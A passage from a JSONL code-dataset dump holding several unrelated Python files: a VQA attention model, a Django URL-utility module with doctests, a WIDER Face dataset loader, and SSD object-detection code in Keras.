nn.ReLU(inplace=True)\r\n\r\n def forward(self, img, qst):\r\n img = self.image_convolution(self.drop(img))\r\n qst = self.question_linear(self.drop(qst))\r\n attention_question = tile_2d_over_nd(qst, img)\r\n result = self.relu(img + attention_question)\r\n result = self.result_convolution(self.drop(result))\r\n return result\r\n\r\n\r\nclass VqaModel(nn.Module):\r\n def __init__(self, input_text_size, output_text_size):\r\n super(VqaModel, self).__init__()\r\n print('Using encoded images')\r\n self.question_encoder = TextEncoder(input_text_size)\r\n self.activation = nn.Tanh()\r\n self.attention = AttentionModel()\r\n self.dropout1 = nn.Dropout(DROPOUT)\r\n self.dropout2 = nn.Dropout(DROPOUT)\r\n\r\n self.linear1 = nn.Linear(GLIMPSES * IMAGE_FEATURES + TEXT_FEATURES, TEXT_FEATURES)\r\n self.activation2 = nn.ReLU()\r\n self.linear2 = nn.Linear(TEXT_FEATURES, output_text_size)\r\n\r\n for m in self.modules():\r\n if isinstance(m, nn.Linear):\r\n nn.init.xavier_uniform_(m.weight)\r\n if m.bias is not None:\r\n m.bias.data.zero_()\r\n\r\n def forward(self, img, qst):\r\n l2_norm = img.norm(p=2, dim=1, keepdim=True).detach()\r\n img_ = img.div(l2_norm)\r\n\r\n qst_ = self.question_encoder(qst)\r\n attention = self.attention(img_, qst_)\r\n img_ = apply_attention(img_, attention)\r\n combined = torch.cat([img_, qst_], dim=1)\r\n combined = self.dropout1(combined)\r\n combined = self.linear1(combined)\r\n combined = self.activation2(combined)\r\n\r\n combined = self.dropout2(combined)\r\n combined = self.linear2(combined)\r\n return combined\r\n\r\n\r\ndef tile_2d_over_nd(feature_vector, feature_map):\r\n \"\"\" Repeat the same feature vector over all spatial positions of a given feature map.\r\n The feature vector should have the same batch size and number of features as the feature map.\r\n \"\"\"\r\n n, c = feature_vector.size()\r\n spatial_size = feature_map.dim() - 2\r\n tiled = feature_vector.view(n, c, *([1] * spatial_size)).expand_as(feature_map)\r\n return tiled\r\n\r\n\r\ndef apply_attention(input, attention):\r\n \"\"\" Apply any number of attention maps over the input. \"\"\"\r\n n, c = input.size()[:2]\r\n glimpses = attention.size(1)\r\n\r\n # flatten the spatial dims into the third dim, since we don't need to care about how they are arranged\r\n input = input.view(n, 1, c, -1) # [n, 1, c, s]\r\n attention = attention.view(n, glimpses, -1)\r\n attention = F.softmax(attention, dim=-1).unsqueeze(2) # [n, g, 1, s]\r\n weighted = attention * input # [n, g, v, s]\r\n weighted_mean = weighted.sum(dim=-1) # [n, g, v]\r\n return weighted_mean.view(n, -1)\r\n","sub_path":"models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":4617,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"66995335","text":"# uncompyle6 version 3.7.4\n# Python bytecode 2.7 (62211)\n# Decompiled from: Python 3.6.9 (default, Apr 18 2020, 01:56:04) \n# [GCC 8.4.0]\n# Embedded file name: d:\\Dropbox\\vk\\django-url-methods\\urlmethods\\urlmethods.py\n# Compiled at: 2014-04-29 04:58:50\n\"\"\"\nhttp://www.ietf.org/rfc/rfc2396.txt\n\"\"\"\nimport re\nfrom threadmethod import threadmethod\nSPLIT_RE = re.compile('^(([^:/?#]+):)?(//([^/?#]*))?([^?#]*)(\\\\?([^#]*))?(#(.*))?')\n\ndef urlsplit(url):\n \"\"\"\n Split given ``url`` to the tuple\n (scheme, authority, path, query, fragment).\n \n >>> urlsplit('http://www.ics.uci.edu/pub/ietf/uri/?arg1=value1&arg2=value2#Related')\n ('http', 'www.ics.uci.edu', '/pub/ietf/uri/', 'arg1=value1&arg2=value2', 'Related')\n \n >>> urlsplit('http://www.ics.uci.edu')\n ('http', 'www.ics.uci.edu', '', None, None)\n \n >>> urlsplit('http://www.ics.uci.edu/')\n ('http', 'www.ics.uci.edu', '/', None, None)\n \n >>> urlsplit('http:/www.ics.uci.edu/')\n ('http', None, '/www.ics.uci.edu/', None, None)\n \n >>> urlsplit('http:www.ics.uci.edu/')\n ('http', None, 'www.ics.uci.edu/', None, None)\n \n >>> urlsplit('http/://www.ics.uci.edu/')\n (None, None, 'http/://www.ics.uci.edu/', None, None)\n\n >>> urlsplit('/img.png')\n (None, None, '/img.png', None, None)\n \n >>> urlsplit('')\n (None, None, '', None, None)\n \"\"\"\n match = SPLIT_RE.match(url)\n return (match.group(2), match.group(4), match.group(5), match.group(7), match.group(9))\n\n\ndef urljoin(scheme, authority, path, query, fragment):\n \"\"\"\n Join url from given\n ``scheme``, ``authority``, ``path``, ``query``, ``fragment``.\n\n >>> url = 'http://www.ics.uci.edu/pub/ietf/uri/?arg1=value1&arg2=value2#Related'\n >>> urljoin(*urlsplit(url)) == url\n True\n\n >>> url = '/img.png'\n >>> urljoin(*urlsplit(url)) == url\n True\n\n >>> url = ''\n >>> urljoin(*urlsplit(url)) == url\n True\n \"\"\"\n result = ''\n if scheme is not None:\n result += scheme + ':'\n if authority is not None:\n result += '//' + authority\n if path is not None:\n result += path\n if query is not None:\n result += '?' + query\n if fragment is not None:\n result += '#' + fragment\n return result\n\n\nURL_FIX_RE = re.compile('%(?![0-9A-Fa-f]{2})')\nURL_FIX_RELP = '%25'\n\ndef urlfix(url):\n \"\"\"\n Fix quotes in uri.\n \n >>> urlfix('/img.jpg')\n '/img.jpg'\n\n >>> urlfix('/%69mg.jpg')\n '/%69mg.jpg'\n\n >>> urlfix('/%mg.jpg')\n '/%25mg.jpg'\n \n >>> urlfix('Q%WW%R%1TT%2%YYY%%34UU%a5%6A')\n 'Q%25WW%25R%251TT%252%25YYY%25%34UU%a5%6A'\n \"\"\"\n return URL_FIX_RE.sub(URL_FIX_RELP, url)\n\n\ndef remote_check(url, user_agent='Urlmethos'):\n \"\"\"\n Try to fetch specified ``url``.\n Return True if success.\n \n >>> remote_check('http://example.com')\n True\n\n >>> remote_check('http://example.com/')\n True\n \n >>> remote_check('http://example.com/?ask#anchor')\n True\n \n >>> remote_check('http://example.com/does.not.exist.html')\n False\n \n >>> remote_check('http://does.not.exist')\n False\n\n >>> remote_check('unsupported://example.com')\n False\n\n >>> remote_check('example.com')\n False\n \"\"\"\n import urllib2\n headers = {'Accept': 'text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5', \n 'Accept-Language': 'en-us,en;q=0.5', \n 'Accept-Charset': 'ISO-8859-1,utf-8;q=0.7,*;q=0.7', \n 'Connection': 'close', \n 'User-Agent': user_agent}\n try:\n req = urllib2.Request(url, None, headers)\n urllib2.urlopen(req)\n except:\n return False\n\n return True\n\n\ndef get_path(base_url, url):\n \"\"\"\n Returns None or path after base url.\n\n >>> get_path('/media/', '/media/foo.bar')\n 'foo.bar'\n\n >>> get_path('/media/', '/media/')\n ''\n\n >>> get_path('/media/', '/media') is None\n True\n\n >>> get_path('/media/', 'media/') is None\n True\n\n >>> get_path('/media/', 'baz') is None\n True\n\n \"\"\"\n regexp = re.compile('^%s(?P.*)$' % re.escape(base_url))\n match = regexp.match(url)\n if not match:\n return None\n else:\n return match.groupdict()['path']\n\n\ndef local_media_response(path, data):\n \"\"\"\n Returns None or media serve response.\n\n >>> local_media_response('/foo/bar', {}) is None\n True\n\n >>> local_media_response('/media/foo', {}).status_code\n 200\n\n >>> local_media_response('/media/does.not.exist', {}).status_code\n 404\n \"\"\"\n from django.conf import settings\n from django.http import Http404, HttpResponseNotFound\n from django.views.static import serve\n from django.test.client import RequestFactory\n media_path = get_path(settings.MEDIA_URL, path)\n if media_path is None:\n return\n else:\n factory = RequestFactory()\n request = factory.get(path, data)\n try:\n return serve(request=request, path=media_path, document_root=settings.MEDIA_ROOT)\n except Http404:\n return HttpResponseNotFound()\n\n return\n\n\ndef local_static_response(path, data):\n \"\"\"\n Returns None or static serve response.\n\n >>> local_static_response('/foo/bar', {}) is None\n True\n\n >>> local_static_response('/static/admin/css/base.css', {}).status_code\n 200\n\n >>> local_static_response('/static/does.not.exist', {}).status_code\n 404\n \"\"\"\n from django.conf import settings\n from django.contrib.staticfiles.views import serve\n try:\n from django.contrib.staticfiles.handlers import url2pathname\n except ImportError:\n from urllib import url2pathname\n\n from django.http import Http404, HttpResponseNotFound\n from django.test.client import RequestFactory\n static_path = get_path(settings.STATIC_URL, path)\n if static_path is None:\n return\n else:\n factory = RequestFactory()\n request = factory.get(path, data)\n path_name = url2pathname(static_path)\n try:\n return serve(request=request, path=path_name, insecure=True)\n except Http404:\n return HttpResponseNotFound()\n\n return\n\n\ndef local_response_unthreaded(path, query=None, follow_redirect=10):\n \"\"\"\n Try to fetch specified ``path`` using django.test.Client.\n\n ``query`` is string with query.\n\n ``follow_redirect`` is number of redirects to be followed.\n\n Return response.\n\n You must use threaded version of this function (local_response).\n \"\"\"\n from django.http import QueryDict\n from django.test.client import Client\n client = Client()\n if query:\n data = QueryDict(query)\n else:\n data = {}\n while True:\n response = local_media_response(path, data)\n if response is None:\n response = local_static_response(path, data)\n if response is None:\n response = client.get(path, data)\n if follow_redirect and follow_redirect > 0 and response.status_code in (301,\n 302):\n follow_redirect -= 1\n scheme, authority, path, query, fragment = urlsplit(response['Location'])\n if scheme == 'http' and authority == 'testserver':\n continue\n break\n\n return response\n\n\n@threadmethod()\ndef local_response(path, query=None, follow_redirect=10):\n \"\"\"\n Try to fetch specified ``path`` using django.test.Client.\n\n ``query`` is string with query.\n\n ``follow_redirect`` is number of redirects to be followed.\n\n Return response.\n\n To prevent exceptions when local request will be called from request\n we must run it in separated thread.\n\n >>> local_response('/response').status_code\n 200\n\n >>> local_response('/notfound').status_code\n 404\n\n >>> local_response('/error').status_code\n 500\n\n >>> local_response('/redirect_response').status_code\n 200\n\n >>> local_response('/redirect_notfound').status_code\n 404\n\n >>> local_response('/redirect_redirect_response').status_code\n 200\n\n >>> local_response('/redirect_cicle').status_code\n 302\n\n >>> local_response('/permanent_redirect_response').status_code\n 200\n\n >>> local_response('/http404').status_code\n 404\n\n >>> local_response('/http500')\n Traceback (most recent call last):\n ...\n Exception\n\n >>> local_response('/request_true_response').content\n 'True'\n\n >>> local_response('/request_false_response').content\n 'False'\n\n >>> local_response('/does.not.exist').status_code\n 404\n\n >>> local_response('/media/foo').status_code\n 200\n\n >>> local_response('/media/does.not.exist').status_code\n 404\n\n >>> local_response('/static/admin/css/base.css').status_code\n 200\n\n >>> local_response('/static/does.not.exist').status_code\n 404\n \"\"\"\n return local_response_unthreaded(path, query, follow_redirect)\n\n\ndef local_check(path, query=None, follow_redirect=10):\n \"\"\"\n Try to fetch specified ``path`` using django.test.Client.\n ``query`` is string with query.\n Return True if success.\n\n >>> local_check('/response')\n True\n\n >>> local_check('/notfound')\n False\n\n >>> local_check('/error')\n False\n\n >>> local_check('/redirect_response')\n True\n\n >>> local_check('/redirect_notfound')\n False\n\n >>> local_check('/redirect_redirect_response')\n True\n\n >>> local_check('/redirect_cicle')\n False\n\n >>> local_check('/permanent_redirect_response')\n True\n\n >>> local_check('/http404')\n False\n\n >>> local_check('/http500')\n False\n\n >>> local_check('/request_true_response')\n True\n\n >>> local_check('/request_false_response')\n True\n\n >>> local_check('/does.not.exist')\n False\n\n >>> local_check('/media/foo')\n True\n\n >>> local_check('/media/does.not.exist')\n False\n\n >>> local_check('/static/admin/css/base.css')\n True\n\n >>> local_check('/static/does.not.exist')\n False\n \"\"\"\n try:\n response = local_response(path, query, follow_redirect)\n return response.status_code == 200\n except:\n return False","sub_path":"pycfiles/django-url-methods-0.2.0/urlmethods.py","file_name":"urlmethods.py","file_ext":"py","file_size_in_byte":10130,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"620436487","text":"import numpy as np\nimport mmcv\nfrom .registry import DATASETS\nfrom .custom import CustomDataset\n@DATASETS.register_module\nclass WIDERFaceDataset(CustomDataset):\n \"\"\"\n Reader for the WIDER Face dataset in PASCAL VOC format.\n Conversion scripts can be found in\n https://github.com/sovrasov/wider-face-pascal-voc-annotations\n \"\"\"\n CLASSES = ('face', )\n\n def __init__(self, min_size=None, **kwargs):\n self.min_size = min_size\n super(WIDERFaceDataset, self).__init__(**kwargs)\n\n def load_annotations(self, ann_file):\n img_info = mmcv.load(ann_file)\n for i, img in enumerate(img_info):\n ann = img['ann']\n gt_bboxes = []\n gt_bboxes_ignore = []\n gt_labels = []\n for box in ann['bboxes']:\n x1, y1, w, h= box\n area = w * h\n bbox = [x1, y1, x1 + w - 1, y1 + h - 1]\n if self.min_size is not None:\n if area < self.min_size:\n gt_bboxes_ignore.append(bbox)\n else:\n gt_labels.append(1)\n gt_bboxes.append(bbox)\n else:\n gt_labels.append(1)\n gt_bboxes.append(bbox)\n\n if gt_bboxes:\n gt_bboxes = np.array(gt_bboxes, dtype=np.float32)\n gt_labels = np.array(gt_labels, dtype=np.int64)\n else:\n gt_bboxes = np.zeros((0, 4), dtype=np.float32)\n gt_labels = np.array([], dtype=np.int64)\n\n if gt_bboxes_ignore:\n gt_bboxes_ignore = np.array(gt_bboxes_ignore, dtype=np.float32)\n else:\n gt_bboxes_ignore = np.zeros((0, 4), dtype=np.float32)\n\n ann = dict(\n bboxes=gt_bboxes, labels=gt_labels, bboxes_ignore=gt_bboxes_ignore)\n img_info[i]['ann'] = ann\n\n\n \n return img_info\n","sub_path":"mmdet/datasets/wider_face.py","file_name":"wider_face.py","file_ext":"py","file_size_in_byte":1959,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"28"} +{"seq_id":"71844926","text":"# Code adapted from https://github.com/rykov8/ssd_keras\n\nimport keras.backend as K\nfrom keras.layers import Activation\nfrom keras.layers import Conv2D\nfrom keras.layers import Dense\nfrom keras.layers import Flatten\nfrom keras.layers import GlobalAveragePooling2D\nfrom keras.layers import Input\nfrom keras.layers import MaxPooling2D\nfrom keras.layers import Reshape\nfrom keras.layers import ZeroPadding2D\nfrom keras.models import Model as KerasModel\nfrom keras.layers import concatenate\nfrom keras.layers import Dropout\nfrom keras.utils import Sequence\nfrom keras.applications.imagenet_utils import preprocess_input\nfrom keras.preprocessing import image\nfrom keras.models import load_model\nfrom keras.optimizers import SGD\n\nfrom keras.engine.topology import InputSpec\nfrom keras.engine.topology import Layer\nimport numpy as np\nimport tensorflow as tf\nimport pickle\nimport os\nimport cv2\nfrom random import shuffle\nfrom xml.etree import ElementTree\n\nimport vectorial.core\n\n\nclass MultiboxLoss(object):\n \"\"\"Multibox loss with some helper functions.\n # Arguments\n num_classes: Number of classes including background.\n alpha: Weight of L1-smooth loss.\n neg_pos_ratio: Max ratio of negative to positive boxes in loss.\n background_label_id: Id of background label.\n negatives_for_hard: Number of negative boxes to consider\n it there is no positive boxes in batch.\n # References\n https://arxiv.org/abs/1512.02325\n # TODO\n Add possibility for background label id be not zero\n \"\"\"\n def __init__(self, num_classes, alpha=1.0, neg_pos_ratio=3.0,\n background_label_id=0, negatives_for_hard=100.0):\n self.num_classes = num_classes\n self.alpha = alpha\n self.neg_pos_ratio = neg_pos_ratio\n if background_label_id != 0:\n raise Exception('Only 0 as background label id is supported')\n self.background_label_id = background_label_id\n self.negatives_for_hard = negatives_for_hard\n\n def _l1_smooth_loss(self, y_true, y_pred):\n \"\"\"Compute L1-smooth loss.\n # Arguments\n y_true: Ground truth bounding boxes,\n tensor of shape (?, num_boxes, 4).\n y_pred: Predicted bounding boxes,\n tensor of shape (?, num_boxes, 4).\n # Returns\n l1_loss: L1-smooth loss, tensor of shape (?, num_boxes).\n # References\n https://arxiv.org/abs/1504.08083\n \"\"\"\n abs_loss = tf.abs(y_true - y_pred)\n sq_loss = 0.5 * (y_true - y_pred)**2\n l1_loss = tf.where(tf.less(abs_loss, 1.0), sq_loss, abs_loss - 0.5)\n return tf.reduce_sum(l1_loss, -1)\n\n def _softmax_loss(self, y_true, y_pred):\n \"\"\"Compute softmax loss.\n # Arguments\n y_true: Ground truth targets,\n tensor of shape (?, num_boxes, num_classes).\n y_pred: Predicted logits,\n tensor of shape (?, num_boxes, num_classes).\n # Returns\n softmax_loss: Softmax loss, tensor of shape (?, num_boxes).\n \"\"\"\n y_pred = tf.maximum(tf.minimum(y_pred, 1 - 1e-15), 1e-15)\n softmax_loss = -tf.reduce_sum(y_true * tf.log(y_pred),\n axis=-1)\n return softmax_loss\n\n def compute_loss(self, y_true, y_pred):\n \"\"\"Compute mutlibox loss.\n # Arguments\n y_true: Ground truth targets,\n tensor of shape (?, num_boxes, 4 + num_classes + 8),\n priors in ground truth are fictitious,\n y_true[:, :, -8] has 1 if prior should be penalized\n or in other words is assigned to some ground truth box,\n y_true[:, :, -7:] are all 0.\n y_pred: Predicted logits,\n tensor of shape (?, num_boxes, 4 + num_classes + 8).\n # Returns\n loss: Loss for prediction, tensor of shape (?,).\n \"\"\"\n batch_size = tf.shape(y_true)[0]\n num_boxes = tf.to_float(tf.shape(y_true)[1])\n\n # loss for all priors\n conf_loss = self._softmax_loss(y_true[:, :, 4:-8],\n y_pred[:, :, 4:-8])\n loc_loss = self._l1_smooth_loss(y_true[:, :, :4],\n y_pred[:, :, :4])\n\n # get positives loss\n num_pos = tf.reduce_sum(y_true[:, :, -8], axis=-1)\n pos_loc_loss = tf.reduce_sum(loc_loss * y_true[:, :, -8],\n axis=1)\n pos_conf_loss = tf.reduce_sum(conf_loss * y_true[:, :, -8],\n axis=1)\n\n # get negatives loss, we penalize only confidence here\n num_neg = tf.minimum(self.neg_pos_ratio * num_pos,\n num_boxes - num_pos)\n pos_num_neg_mask = tf.greater(num_neg, 0)\n has_min = tf.to_float(tf.reduce_any(pos_num_neg_mask))\n num_neg = tf.concat(axis=0, values=[num_neg,\n [(1 - has_min) * self.negatives_for_hard]])\n num_neg_batch = tf.reduce_min(tf.boolean_mask(num_neg,\n tf.greater(num_neg, 0)))\n num_neg_batch = tf.to_int32(num_neg_batch)\n confs_start = 4 + self.background_label_id + 1\n confs_end = confs_start + self.num_classes - 1\n max_confs = tf.reduce_max(y_pred[:, :, confs_start:confs_end],\n axis=2)\n _, indices = tf.nn.top_k(max_confs * (1 - y_true[:, :, -8]),\n k=num_neg_batch)\n batch_idx = tf.expand_dims(tf.range(0, batch_size), 1)\n batch_idx = tf.tile(batch_idx, (1, num_neg_batch))\n full_indices = (tf.reshape(batch_idx, [-1]) * tf.to_int32(num_boxes) +\n tf.reshape(indices, [-1]))\n # full_indices = tf.concat(2, [tf.expand_dims(batch_idx, 2),\n # tf.expand_dims(indices, 2)])\n # neg_conf_loss = tf.gather_nd(conf_loss, full_indices)\n neg_conf_loss = tf.gather(tf.reshape(conf_loss, [-1]),\n full_indices)\n neg_conf_loss = tf.reshape(neg_conf_loss,\n [batch_size, num_neg_batch])\n neg_conf_loss = tf.reduce_sum(neg_conf_loss, axis=1)\n\n # loss is sum of positives and negatives\n total_loss = pos_conf_loss + neg_conf_loss\n total_loss /= (num_pos + tf.to_float(num_neg_batch))\n num_pos = tf.where(tf.not_equal(num_pos, 0), num_pos,\n tf.ones_like(num_pos))\n total_loss += (self.alpha * pos_loc_loss) / num_pos\n return total_loss\n\nclass BBoxUtility(object):\n \"\"\"Utility class to do some stuff with bounding boxes and priors.\n\n # Arguments\n num_classes: Number of classes including background.\n priors: Priors and variances, numpy tensor of shape (num_priors, 8),\n priors[i] = [xmin, ymin, xmax, ymax, varxc, varyc, varw, varh].\n overlap_threshold: Threshold to assign box to a prior.\n nms_thresh: Nms threshold.\n top_k: Number of total bboxes to be kept per image after nms step.\n\n # References\n https://arxiv.org/abs/1512.02325\n \"\"\"\n # TODO add setter methods for nms_thresh and top_K\n def __init__(self, num_classes, priors=None, overlap_threshold=0.5,\n nms_thresh=0.45, top_k=400):\n self.num_classes = num_classes\n self.priors = priors\n self.num_priors = 0 if priors is None else len(priors)\n self.overlap_threshold = overlap_threshold\n self._nms_thresh = nms_thresh\n self._top_k = top_k\n self.boxes = tf.placeholder(dtype='float32', shape=(None, 4))\n self.scores = tf.placeholder(dtype='float32', shape=(None,))\n self.nms = tf.image.non_max_suppression(self.boxes, self.scores,\n self._top_k,\n iou_threshold=self._nms_thresh)\n self.sess = tf.Session(config=tf.ConfigProto(device_count={'GPU': 0}))\n\n @property\n def nms_thresh(self):\n return self._nms_thresh\n\n @nms_thresh.setter\n def nms_thresh(self, value):\n self._nms_thresh = value\n self.nms = tf.image.non_max_suppression(self.boxes, self.scores,\n self._top_k,\n iou_threshold=self._nms_thresh)\n\n @property\n def top_k(self):\n return self._top_k\n\n @top_k.setter\n def top_k(self, value):\n self._top_k = value\n self.nms = tf.image.non_max_suppression(self.boxes, self.scores,\n self._top_k,\n iou_threshold=self._nms_thresh)\n\n def iou(self, box):\n \"\"\"Compute intersection over union for the box with all priors.\n\n # Arguments\n box: Box, numpy tensor of shape (4,).\n\n # Return\n iou: Intersection over union,\n numpy tensor of shape (num_priors).\n \"\"\"\n # compute intersection\n inter_upleft = np.maximum(self.priors[:, :2], box[:2])\n inter_botright = np.minimum(self.priors[:, 2:4], box[2:])\n inter_wh = inter_botright - inter_upleft\n inter_wh = np.maximum(inter_wh, 0)\n inter = inter_wh[:, 0] * inter_wh[:, 1]\n # compute union\n area_pred = (box[2] - box[0]) * (box[3] - box[1])\n area_gt = (self.priors[:, 2] - self.priors[:, 0])\n area_gt *= (self.priors[:, 3] - self.priors[:, 1])\n union = area_pred + area_gt - inter\n # compute iou\n iou = inter / union\n return iou\n\n def encode_box(self, box, return_iou=True):\n \"\"\"Encode box for training, do it only for assigned priors.\n\n # Arguments\n box: Box, numpy tensor of shape (4,).\n return_iou: Whether to concat iou to encoded values.\n\n # Return\n encoded_box: Tensor with encoded box\n numpy tensor of shape (num_priors, 4 + int(return_iou)).\n \"\"\"\n iou = self.iou(box)\n encoded_box = np.zeros((self.num_priors, 4 + return_iou))\n assign_mask = iou > self.overlap_threshold\n if not assign_mask.any():\n assign_mask[iou.argmax()] = True\n if return_iou:\n encoded_box[:, -1][assign_mask] = iou[assign_mask]\n assigned_priors = self.priors[assign_mask]\n box_center = 0.5 * (box[:2] + box[2:])\n box_wh = box[2:] - box[:2]\n assigned_priors_center = 0.5 * (assigned_priors[:, :2] +\n assigned_priors[:, 2:4])\n assigned_priors_wh = (assigned_priors[:, 2:4] -\n assigned_priors[:, :2])\n # we encode variance\n encoded_box[:, :2][assign_mask] = box_center - assigned_priors_center\n encoded_box[:, :2][assign_mask] /= assigned_priors_wh\n encoded_box[:, :2][assign_mask] /= assigned_priors[:, -4:-2]\n encoded_box[:, 2:4][assign_mask] = np.log(box_wh /\n assigned_priors_wh)\n encoded_box[:, 2:4][assign_mask] /= assigned_priors[:, -2:]\n return encoded_box.ravel()\n\n def assign_boxes(self, boxes):\n \"\"\"Assign boxes to priors for training.\n\n # Arguments\n boxes: Box, numpy tensor of shape (num_boxes, 4 + num_classes),\n num_classes without background.\n\n # Return\n assignment: Tensor with assigned boxes,\n numpy tensor of shape (num_boxes, 4 + num_classes + 8),\n priors in ground truth are fictitious,\n assignment[:, -8] has 1 if prior should be penalized\n or in other words is assigned to some ground truth box,\n assignment[:, -7:] are all 0. See loss for more details.\n \"\"\"\n assignment = np.zeros((self.num_priors, 4 + self.num_classes + 8))\n assignment[:, 4] = 1.0\n if len(boxes) == 0:\n return assignment\n encoded_boxes = np.apply_along_axis(self.encode_box, 1, boxes[:, :4])\n encoded_boxes = encoded_boxes.reshape(-1, self.num_priors, 5)\n best_iou = encoded_boxes[:, :, -1].max(axis=0)\n best_iou_idx = encoded_boxes[:, :, -1].argmax(axis=0)\n best_iou_mask = best_iou > 0\n best_iou_idx = best_iou_idx[best_iou_mask]\n assign_num = len(best_iou_idx)\n encoded_boxes = encoded_boxes[:, best_iou_mask, :]\n assignment[:, :4][best_iou_mask] = encoded_boxes[best_iou_idx,\n np.arange(assign_num),\n :4]\n assignment[:, 4][best_iou_mask] = 0\n assignment[:, 5:-8][best_iou_mask] = boxes[best_iou_idx, 4:]\n assignment[:, -8][best_iou_mask] = 1\n return assignment\n\n def decode_boxes(self, mbox_loc, mbox_priorbox, variances):\n \"\"\"Convert bboxes from local predictions to shifted priors.\n\n # Arguments\n mbox_loc: Numpy array of predicted locations.\n mbox_priorbox: Numpy array of prior boxes.\n variances: Numpy array of variances.\n\n # Return\n decode_bbox: Shifted priors.\n \"\"\"\n prior_width = mbox_priorbox[:, 2] - mbox_priorbox[:, 0]\n prior_height = mbox_priorbox[:, 3] - mbox_priorbox[:, 1]\n prior_center_x = 0.5 * (mbox_priorbox[:, 2] + mbox_priorbox[:, 0])\n prior_center_y = 0.5 * (mbox_priorbox[:, 3] + mbox_priorbox[:, 1])\n decode_bbox_center_x = mbox_loc[:, 0] * prior_width * variances[:, 0]\n decode_bbox_center_x += prior_center_x\n decode_bbox_center_y = mbox_loc[:, 1] * prior_width * variances[:, 1]\n decode_bbox_center_y += prior_center_y\n decode_bbox_width = np.exp(mbox_loc[:, 2] * variances[:, 2])\n decode_bbox_width *= prior_width\n decode_bbox_height = np.exp(mbox_loc[:, 3] * variances[:, 3])\n decode_bbox_height *= prior_height\n decode_bbox_xmin = decode_bbox_center_x - 0.5 * decode_bbox_width\n decode_bbox_ymin = decode_bbox_center_y - 0.5 * decode_bbox_height\n decode_bbox_xmax = decode_bbox_center_x + 0.5 * decode_bbox_width\n decode_bbox_ymax = decode_bbox_center_y + 0.5 * decode_bbox_height\n decode_bbox = np.concatenate((decode_bbox_xmin[:, None],\n decode_bbox_ymin[:, None],\n decode_bbox_xmax[:, None],\n decode_bbox_ymax[:, None]), axis=-1)\n decode_bbox = np.minimum(np.maximum(decode_bbox, 0.0), 1.0)\n return decode_bbox\n\n def detection_out(self, predictions, background_label_id=0, keep_top_k=200,\n confidence_threshold=0.01):\n \"\"\"Do non maximum suppression (nms) on prediction results.\n\n # Arguments\n predictions: Numpy array of predicted values.\n num_classes: Number of classes for prediction.\n background_label_id: Label of background class.\n keep_top_k: Number of total bboxes to be kept per image\n after nms step.\n confidence_threshold: Only consider detections,\n whose confidences are larger than a threshold.\n\n # Return\n results: List of predictions for every picture. Each prediction is:\n [label, confidence, xmin, ymin, xmax, ymax]\n \"\"\"\n mbox_loc = predictions[:, :, :4]\n variances = predictions[:, :, -4:]\n mbox_priorbox = predictions[:, :, -8:-4]\n mbox_conf = predictions[:, :, 4:-8]\n results = []\n for i in range(len(mbox_loc)):\n results.append([])\n decode_bbox = self.decode_boxes(mbox_loc[i],\n mbox_priorbox[i], variances[i])\n for c in range(self.num_classes):\n if c == background_label_id:\n continue\n c_confs = mbox_conf[i, :, c]\n c_confs_m = c_confs > confidence_threshold\n if len(c_confs[c_confs_m]) > 0:\n boxes_to_process = decode_bbox[c_confs_m]\n confs_to_process = c_confs[c_confs_m]\n feed_dict = {self.boxes: boxes_to_process,\n self.scores: confs_to_process}\n idx = self.sess.run(self.nms, feed_dict=feed_dict)\n good_boxes = boxes_to_process[idx]\n confs = confs_to_process[idx][:, None]\n labels = c * np.ones((len(idx), 1))\n c_pred = np.concatenate((labels, confs, good_boxes),\n axis=1)\n results[-1].extend(c_pred)\n if len(results[-1]) > 0:\n results[-1] = np.array(results[-1])\n argsort = np.argsort(results[-1][:, 1])[::-1]\n results[-1] = results[-1][argsort]\n results[-1] = results[-1][:keep_top_k]\n return results\n\n\nclass Normalize(Layer):\n \"\"\"Normalization layer as described in ParseNet paper.\n\n # Arguments\n scale: Default feature scale.\n\n # Input shape\n 4D tensor with shape:\n `(samples, channels, rows, cols)` if dim_ordering='th'\n or 4D tensor with shape:\n `(samples, rows, cols, channels)` if dim_ordering='tf'.\n\n # Output shape\n Same as input\n\n # References\n http://cs.unc.edu/~wliu/papers/parsenet.pdf\n\n #TODO\n Add possibility to have one scale for all features.\n \"\"\"\n def __init__(self, scale, **kwargs):\n if K.image_dim_ordering() == 'tf':\n self.axis = 3\n else:\n self.axis = 1\n self.scale = scale\n super(Normalize, self).__init__(**kwargs)\n\n def build(self, input_shape):\n self.input_spec = [InputSpec(shape=input_shape)]\n shape = (input_shape[self.axis],)\n init_gamma = self.scale * np.ones(shape)\n self.gamma = K.variable(init_gamma, name='{}_gamma'.format(self.name))\n self.trainable_weights = [self.gamma]\n\n def call(self, x, mask=None):\n output = K.l2_normalize(x, self.axis)\n output *= self.gamma\n return output\n\n\nclass PriorBox(Layer):\n \"\"\"Generate the prior boxes of designated sizes and aspect ratios.\n\n # Arguments\n img_size: Size of the input image as tuple (w, h).\n min_size: Minimum box size in pixels.\n max_size: Maximum box size in pixels.\n aspect_ratios: List of aspect ratios of boxes.\n flip: Whether to consider reverse aspect ratios.\n variances: List of variances for x, y, w, h.\n clip: Whether to clip the prior's coordinates\n such that they are within [0, 1].\n\n # Input shape\n 4D tensor with shape:\n `(samples, channels, rows, cols)` if dim_ordering='th'\n or 4D tensor with shape:\n `(samples, rows, cols, channels)` if dim_ordering='tf'.\n\n # Output shape\n 3D tensor with shape:\n (samples, num_boxes, 8)\n\n # References\n https://arxiv.org/abs/1512.02325\n\n #TODO\n Add possibility not to have variances.\n Add Theano support\n \"\"\"\n def __init__(self, img_size, min_size, max_size=None, aspect_ratios=None,\n flip=True, variances=[0.1], clip=True, **kwargs):\n if K.image_dim_ordering() == 'tf':\n self.waxis = 2\n self.haxis = 1\n else:\n self.waxis = 3\n self.haxis = 2\n self.img_size = img_size\n if min_size <= 0:\n raise Exception('min_size must be positive.')\n self.min_size = min_size\n self.max_size = max_size\n self.aspect_ratios = [1.0]\n if max_size:\n if max_size < min_size:\n raise Exception('max_size must be greater than min_size.')\n self.aspect_ratios.append(1.0)\n if aspect_ratios:\n for ar in aspect_ratios:\n if ar in self.aspect_ratios:\n continue\n self.aspect_ratios.append(ar)\n if flip:\n self.aspect_ratios.append(1.0 / ar)\n self.variances = 